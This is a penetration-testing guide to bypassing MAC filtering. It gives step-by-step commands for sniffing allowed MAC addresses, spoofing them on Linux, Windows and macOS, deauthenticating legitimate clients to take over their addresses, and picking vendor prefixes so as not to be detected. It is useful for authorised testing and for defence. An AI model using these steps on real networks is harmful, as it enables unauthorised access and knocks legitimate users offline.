MAC Filtering Bypass
#Overview
MAC filtering is a network access control mechanism that allows or denies network access based on the device's MAC (Media Access Control) address. It's commonly used on wireless APs (allowlist/denylist), wired switches (port security), and NAC systems. MAC filtering is widely considered a weak security control because MAC addresses are transmitted in cleartext and can be easily observed and spoofed.
This guide covers techniques to discover, bypass, and exploit MAC filtering on both wireless and wired networks.
#How MAC Filtering Works
| Implementation | Mechanism | Weakness |
|---|---|---|
| Wireless AP allowlist | Only listed MACs can associate | MAC visible in probe/association frames |
| Wireless AP denylist | Listed MACs are blocked | Trivially bypassed by changing MAC |
| Switch port security | Limits MACs per port | MAC spoofing adds attacker's MAC |
| NAC MAC Authentication Bypass (MAB) | MAC as fallback auth | Spoof an allowed device type |
| RADIUS MAC auth | MAC checked against RADIUS | Same as allowlist but centralized |
#Method 1: Passive MAC Discovery
The first step is always passive monitoring — observe which MAC addresses are authenticated and allowed on the network.
#Wireless MAC Discovery
# Monitor all 802.11 frames to discover authenticated MACs
sudo airodump-ng wlan0mon --channel <CH> --bssid <AP_MAC> --write mac-survey
# Extract unique client MAC addresses
tshark -r mac-survey-01.cap -Y 'wlan.fc.type_subtype == 0x0000' \
-T fields -e wlan.sa | sort -u
# Extract associated client MAC addresses (authenticated)
tshark -r mac-survey-01.cap -Y 'wlan.fc.type_subtype == 0x0001' \
-T fields -e wlan.sa | sort -u
# Show both source and destination MACs
tshark -r mac-survey-01.cap \
-T fields -e wlan.sa -e wlan.da | tr '\t' '\n' | sort -u
BASH
#Wired MAC Discovery
# ARP table shows MAC-IP mappings
arp-scan --interface=eth0 --localnet
# DHCP lease file (if you have DHCP access)
cat /var/lib/dhcp/dhclient.leases
# Switch MAC address table (if you have switch access)
# Cisco: show mac address-table
# Juniper: show ethernet-switching table
# Passive ARP monitoring
tcpdump -i eth0 -nn -e arp
BASH
#Method 2: MAC Spoofing
Once you've identified an allowed MAC address, spoof it on your adapter.
#Linux MAC Spoofing
# Method 1: ip command (preferred)
sudo ip link set dev wlan0 down
sudo ip link set dev wlan0 address <TARGET_MAC>
sudo ip link set dev wlan0 up
# Method 2: ifconfig
sudo ifconfig wlan0 down
sudo ifconfig wlan0 hw ether <TARGET_MAC>
sudo ifconfig wlan0 up
# Method 3: macchanger (random or specific)
sudo ifconfig wlan0 down
sudo macchanger -m <TARGET_MAC> wlan0 # Specific MAC
sudo macchanger -r wlan0 # Random MAC
sudo macchanger -e wlan0 # Randomize vendor bytes, keep OUI
sudo ifconfig wlan0 up
# Method 4: for wireless adapters
sudo iw dev wlan0 set addr <TARGET_MAC>
# Verify MAC change
ip link show wlan0 | grep ether
# or
macchanger -s wlan0
BASH
#Windows MAC Spoofing
# Method 1: Registry (requires reboot)
# Navigate to HKLM\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-...}
# Find the network adapter, set "NetworkAddress" to the target MAC
# Method 2: Device Manager
# Network Adapters → Properties → Advanced → Network Address → Value: <TARGET_MAC>
# Method 3: PowerShell (using NIC Teaming)
Set-NetAdapter -Name "Ethernet" -MacAddress "<TARGET_MAC>"
POWERSHELL
#macOS MAC Spoofing
# Change MAC on macOS
sudo ifconfig en0 ether <TARGET_MAC>
sudo ifconfig en0 down
sudo ifconfig en0 up
# Verify
ifconfig en0 | grep ether
BASH
#Method 3: OUI Fingerprinting for Realistic MACs
When spoofing a MAC, using a realistic OUI (Organizationally Unique Identifier — the first 3 bytes) prevents detection by MAC filtering that checks device type.
# Install OUI database
apt install ieee-data
# Or download: https://standards-ieee.org/products-programs/regauth/oui/
# Look up a vendor's OUI prefix
grep -i "apple" /usr/share/ieee-data/oui.txt
# Result: 00:03:93, 00:05:02, etc.
# Common enterprise device OUIs:
# Dell: 00:01:C8, 00:06:5B, 00:08:74, 00:0B:DB, 00:0D:56
# HP: 00:01:E6, 00:02:A5, 00:04:EA, 00:06:5B, 00:07:85
# Lenovo: 00:1A:A0, 00:1D:72, 00:1E:EC, 00:21:CC, 00:23:18
# Cisco: 00:00:0C, 00:03:E3, 00:05:5E, 00:06:28, 00:08:02
# Aruba: 00:0B:86, 00:0E:38, 00:11:92, 00:14:5E, 00:17:CB
# Polycom: 00:04:F2, 00:07:53, 00:0E:7E, 00:13:C6, 00:16:35
# Generate a realistic MAC for a specific vendor
# Format: OUI:XX:XX:XX where XX is random hex
python3 -c "import random; oui='00:06:5B'; print(f'{oui}:{random.randint(0,255):02X}:{random.randint(0,255):02X}:{random.randint(0,255):02X}')"
BASH
#Method 4: Enterprise AP MAC Filtering Bypass
Enterprise wireless APs (Cisco, Aruba, Ruckus) may implement MAC filtering differently than consumer routers.
#Cisco AP MAC Filtering
# Cisco APs typically use RADIUS MAC authentication
# The AP sends the client MAC to a RADIUS server for approval
# Bypass: Spoof a MAC that's in the RADIUS allowlist
# 1. Monitor for associated clients
sudo airodump-ng wlan0mon --channel <CH> --bssid <AP_MAC>
# 2. Identify allowed MACs (associated clients)
# 3. Choose a MAC with the same device type (OUI) as your adapter
# 4. Disconnect the original client (deauth)
sudo aireplay-ng -0 5 -a <AP_MAC> -c <ORIGINAL_CLIENT_MAC> wlan0mon
# 5. Spoof the MAC and connect
sudo ip link set dev wlan0 down
sudo ip link set dev wlan0 address <ORIGINAL_CLIENT_MAC>
sudo ip link set dev wlan0 up
# Connect to the AP with the spoofed MAC
BASH
#Aruba AP MAC Filtering
# Aruba APs may use a local MAC database or ClearPass for MAC auth
# ClearPass can be bypassed if the MAC matches a known device type
# Bypass: Spoof a printer, IoT device, or VoIP phone MAC
# These device types often have more permissive policies in ClearPass
# Use an OUI from HP (printer), Cisco (VoIP), or a common IoT vendor
# Generate a realistic printer MAC
# HP printer OUI: 00:1A:4B
python3 -c "import random; print(f'00:1A:4B:{random.randint(0,255):02X}:{random.randint(0,255):02X}:{random.randint(0,255):02X}')"
BASH
#Method 5: Wireless MAC Filtering Detection and Bypass
#Detecting MAC Filtering
# Method 1: Association status
# Try to associate with a random MAC
sudo aireplay-ng -1 0 -a <AP_MAC> -h <RANDOM_MAC> wlan0mon
# If association fails, MAC filtering may be active
# Method 2: Check AP configuration (if you have admin access)
# Look for "MAC Filter", "Allowed MACs", "Station Filter"
# Method 3: Association response codes
# Code 1 = Unspecified failure (may indicate MAC filtering)
# Code 10 = Association denied (may indicate MAC filtering)
# Code 12 = Association denied due to policy
BASH
#Bypassing Wireless MAC Filtering
# Step 1: Discover allowed MACs
sudo airodump-ng wlan0mon --channel <CH> --bssid <AP_MAC>
# Step 2: Deauth the client whose MAC you want to spoof
sudo aireplay-ng -0 1 -a <AP_MAC> -c <CLIENT_MAC> wlan0mon
# Step 3: Quickly spoof the MAC and connect
sudo ip link set dev wlan0 down
sudo ip link set dev wlan0 address <CLIENT_MAC>
sudo ip link set dev wlan0 up
# Connect to AP immediately
BASH
#Detection: How Defenders Detect MAC Spoofing
| Detection Method | Indicator |
|---|---|
| Duplicate MAC detection | Same MAC from different ports/locations |
| MAC OUI mismatch | MAC claims to be one vendor but traffic matches another |
| Behavioral analysis | Traffic patterns don't match the spoofed device type |
| DHCP fingerprinting | DHCP request doesn't match the claimed device OS |
| 802.1X authentication | MAC doesn't match the authenticated identity |
| Port security violation | MAC limit exceeded on a switch port |
#Common Pitfalls
- IP conflict: If the original device is still connected with the same IP, you'll create an IP conflict. Wait for the device to disconnect or use a different IP.
- MAC aging: Switch MAC tables age out entries. If the original device disconnects, the switch may clear its MAC before you reconnect.
- Port security: Switches with port security may lock the port after seeing a different MAC. Test by checking if the port is still active after spoofing.
- 802.1X: If 802.1X is active, MAC spoofing alone won't provide access. You need both the correct MAC and 802.1X credentials.
- Wireless adapter limitations: Some wireless adapters don't support MAC spoofing in monitor/managed mode. Test with
iw dev wlan0 set addr <MAC>.
#OPSEC Considerations
- MAC spoofing creates duplicate MAC events that are logged by enterprise switches
- If the original device reconnects while you're using its MAC, both devices will experience connectivity issues
- OUI mismatches (e.g., claiming to be a Dell laptop but using an Alfa WiFi adapter) are detectable by NAC systems
- DHCP fingerprinting reveals the true OS regardless of MAC address
- Use MAC addresses from the same vendor/device type as your adapter to reduce detection
#Cross-References
- NAC Bypass — MAC filtering is often part of NAC
- 802.1X Attacks — 802.1X with MAC spoofing
- Captive Portal Bypass — Captive portals often use MAC filtering
- VLAN Hopping — Combine MAC spoofing with VLAN hopping
- 09 - Lateral Movement — Post-access lateral movement
#Tool References
| Tool | Purpose | Link |
|---|---|---|
| macchanger | MAC address spoofing | https://github.com/alxchk/macchanger |
| airodump-ng | Wireless MAC discovery | https://www.aircrack-ng.org/ |
| arp-scan | Wired MAC discovery | https://github.com/royhills/arp-scan |
| tshark | Packet analysis | https://www.wireshark.org/ |
| scapy | Packet crafting and spoofing | https://scapy.net/ |